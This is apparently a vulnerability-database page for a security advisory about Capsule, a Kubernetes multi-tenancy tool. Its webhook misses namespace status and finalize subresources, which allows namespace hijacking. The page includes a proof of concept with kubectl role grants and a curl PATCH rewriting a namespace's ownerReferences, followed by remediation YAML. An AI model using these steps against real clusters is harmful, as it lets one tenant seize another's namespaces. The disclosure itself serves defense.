logo

Database

Lack of data validation In github.com/projectcapsule/capsule

Description

Capsule Namespace Hijacking via subresource

Summary

To defend against namespace hijacking achieved through update/patch operations on namespaces, Capsule uses a webhook to validate update requests targeting namespaces. However, in Kubernetes, the namespace/finalize and namespace/status subresource APIs can also modify various fields of a namespace, including the metadata field. The webhook does not define interception rules for these subresources. As a result, if a tenant administrator has permission to modify namespace/status or namespace/finalize, they can successfully perform namespace hijacking.

Details

When Capsule uses a ValidatingWebhookConfiguration to intercept changes to namespace resources, it does not intercept modification requests initiated through namespace subresource APIs (see: https://github.com/projectcapsule/capsule/blob/main/charts/capsule/templates/validatingwebhookconfiguration.yaml#L193). Through subresource APIs, it is still possible to modify the metadata field of a namespace resource, enabling hijacking.

PoC

Open two terminals and create two tenants:

kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: oil
spec:
  owners:
  - name: alice...
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
  name: attacker
spec:
  owners:
  - name: attacker...

When the attacker has permission to modify namespace/status or namespace/finalize, they can hijack other namespaces. Here we grant the attacker the relevant permissions:

kubectl create clusterrole status --verb=patch --resource=namespaces/status
kubectl create clusterrolebinding status --clusterrole=status --user=attacker

The attacker then sends a PATCH request to namespace/status to hijack the namespace created by alice:

curl -k --cert ./attacker-attacker.crt --key attacker-attacker.key --request PATCH 'https://192.168.201.12:6443/api/v1/namespaces/solar-production/status' \
--header 'Content-Type: application/json-patch+json' \
--data '[
    {
      "op": "replace",
      "path": "/metadata/ownerReferences",
      "value": [
        {...

Impact

hijack namespace

Remediation

To mitigate this issue, add the following two subresources to the resources list in the ValidatingWebhookConfiguration rules:

    resources:
    - namespaces
    - namespaces/status
	- namespace/finalize

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2026-309632. NVD-2026-309633. OSV-2026-309634. GHSA-2ww6-hf35-mfjm5. GCVE-2026-30963

References

1. https://github.com/projectcapsule/capsule/security/advisories/GHSA-2ww6-hf35-mfjm2. https://github.com/projectcapsule/capsule/releases/tag/v0.13.0

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.